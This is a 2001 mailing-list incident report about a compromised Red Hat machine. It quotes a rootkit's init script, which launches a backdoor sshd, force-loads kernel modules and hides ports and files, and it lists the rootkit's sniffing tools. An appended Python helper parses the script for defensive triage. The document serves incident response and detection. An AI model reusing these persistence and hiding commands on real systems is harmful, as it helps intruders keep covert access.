Security Incidents mailing list archives
Cracked. Possible(?) new rootkit ?
From: maarten van den Berg <maarten () VBVB NL>
Date: Wed, 14 Feb 2001 16:21:17 +0100
Hi,

Maybe I'm mistaken and this is old stuff, but... I recently found a box which was obviously cracked, at least all the evidence definitely points that way...:

After a (kernel-)upgrade, some service led to crashing the whole machine. The service in question was called "system", and this is what /etc/rc.d/rc3.d/S99system looks like:

_____ cut here ______
#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

/var/kerb/ssh.d > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
#exec redir
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd
/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null
#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
_____ cut here _____

Judging just from the file, an alternative sshd (ssh.d) is started, two kernel modules are inserted, a binary hides certain strings in something network-related, and a binary 'hidef' hides everything, including itself. I have not had time yet to do any more research, but I bet it was just pure luck that this toolkit didn't function well under a new kernel, thus exposing itself...

I know what to do now, reinstall from scratch, but I was wondering if this is interesting stuff for the list, or whether it is merely the Nth+1 crack of a Redhat box (not MY favorite flavour, btw) with a well-known rootkit etc.

Oh, and by the way: before discovery, I ran chkrootkit v 0.19, but that didn't detect anything, running or otherwise.

Maarten

_____ Listing of /var/kerb/ _____
drwxr-xr-x root/ftp       0 2000-07-27 21:40:46 kerb/
drwxr-xr-x root/root      0 2000-07-12 03:43:50 kerb/s/
-rwxr-xr-x root/root 129076 2000-07-12 03:20:11 kerb/s/dsniff
-rwxr-xr-x root/root  20100 2000-07-12 03:20:16 kerb/s/arpredirect
-rw-r--r-- root/root   1009 2000-07-12 03:43:50 kerb/s/dsniff.services
-rwxr-xr-x root/root  93580 2000-07-12 03:26:17 kerb/s/urlsnarf
-rwxr-xr-x root/ftp   13468 2000-07-12 08:29:59 kerb/ered
-rwxr-xr-x root/ftp    3984 2000-07-12 08:29:59 kerb/hidef
-rw-r--r-- root/ftp     537 2000-07-12 08:29:59 kerb/k.a
-rwxr-xr-x root/ftp   35016 2000-07-12 08:29:59 kerb/l
-rwxr-xr-x root/ftp   13036 2000-07-12 08:29:59 kerb/nethide
-rwxr-xr-x root/ftp   27896 2000-07-12 08:29:59 kerb/p
-rwxr-xr-x root/ftp    8128 2000-07-12 08:29:59 kerb/pidof
-rw------- root/ftp     512 2001-02-14 16:01:40 kerb/sd.a
-rwxr-xr-x root/ftp  196408 2000-07-12 08:29:59 kerb/ssh.d
-rw-r--r-- root/ftp     960 2000-07-12 08:29:59 kerb/supermd.o
-rw-r--r-- root/ftp   12292 2000-07-12 08:29:59 kerb/supernw.o
_____ end of listing _____
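The S99system script in the post is a compact record of what the rootkit does at every boot, and a responder's first job is to extract that record. The following triage helper is an added example, not code from the post or from the rootkit: it parses the quoted script (embedded as a constructed sample, with the header comment shortened and the commands unchanged), lists the force-loaded kernel modules and the binaries started from outside the system bin directories, decodes the nethide arguments, and flags self-hiding behaviour. The port decoding rests on the /proc/net/tcp format, which prints local and remote ports as four hex digits, so a filter on ":1F98" hides entries for port 8088; the names of the tools (insmod, nethide, hidef) are taken from the script itself, and the script's exact behaviour beyond what its command lines show is not assumed.

```python
"""Triage of a suspicious SysV init script (added example, not the post's code)."""
import re
import shlex

# Constructed sample: the commands of /etc/rc.d/rc3.d/S99system as quoted in
# the post (the original header comment is shortened; commands are unchanged).
SAMPLE_SCRIPT = """#!/bin/sh
# This script will be executed *after* all the other init scripts.
/var/kerb/ssh.d > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supernw.o > /dev/null 2> /dev/null
/sbin/insmod -f /var/kerb/supermd.o > /dev/null 2> /dev/null
/bin/kill -31 `/var/kerb/pidof ssh.d` > /dev/null 2> /dev/null
#exec redir
#/var/kerb/ered /usr/sbin/in.ftpd /usr/bin/in.ftpd
/var/kerb/nethide ":1F98" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F91" > /dev/null 2> /dev/null
/var/kerb/nethide ":1F92" > /dev/null 2> /dev/null
#/var/kerb/hidef /usr/bin/in.ftpd > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ered > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/nethide > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/pidof > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/rexec > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/ssh.d > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/k.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/sd.a > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supernw.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/supermd.o > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/p > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/l > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/s > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc3.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /etc/rc.d/rc5.d/S99system > /dev/null 2> /dev/null
/var/kerb/hidef /var/kerb/hidef > /dev/null 2> /dev/null
"""

# Directories a distribution's own init scripts normally start programs from.
SYSTEM_BIN_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/")
INIT_DIRS = ("/etc/rc.d/", "/etc/init.d/")
# Matches shell redirections such as "> /dev/null" and "2> /dev/null".
REDIRECT_RE = re.compile(r"\s*\d?>>?\s*\S+")


def parse_commands(script):
    """Return the argv of every command line, skipping comments and the shebang.
    Redirections are dropped and backtick substitutions flattened into words,
    which is enough to see what each line runs."""
    commands = []
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        argv = shlex.split(REDIRECT_RE.sub("", line).replace("`", ""))
        if argv:
            commands.append(argv)
    return commands


def analyse(script):
    """Summarise what the script does at boot and flag rootkit-like traits."""
    report = {"modules": [], "foreign_binaries": [], "hidden_paths": [],
              "hidden_ports": [], "findings": []}
    hiders = set()
    for argv in parse_commands(script):
        prog = argv[0]
        if not prog.startswith(SYSTEM_BIN_DIRS) and prog not in report["foreign_binaries"]:
            report["foreign_binaries"].append(prog)
        if prog.endswith("/insmod"):
            module = argv[-1]
            report["modules"].append(module)
            if "-f" in argv:
                report["findings"].append(f"forced module load (insmod -f): {module}")
        elif prog.endswith("/nethide"):
            # /proc/net/tcp shows ports as 4 hex digits; ":1F98" selects port 0x1F98.
            report["hidden_ports"].append(int(argv[1].lstrip(":"), 16))
        elif prog.endswith("/hidef"):
            hiders.add(prog)
            report["hidden_paths"].append(argv[1])
    if any(p.startswith(INIT_DIRS) for p in report["hidden_paths"]):
        report["findings"].append("init script hides itself from directory listings")
    if hiders & set(report["hidden_paths"]):
        report["findings"].append("file-hiding tool hides its own binary")
    return report


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Run against the sample, the report shows the two force-loaded modules, three binaries started from /var/kerb, sixteen hidden paths including both S99system links and hidef itself, and hidden ports 8088, 8081 and 8082. The same parser can be pointed at any rc script collected from a suspect host (preferably from a mounted image rather than from the live system, where hidef-style hiding would already be in effect), and a script that starts anything outside the system bin directories or loads modules with insmod -f deserves a closer look.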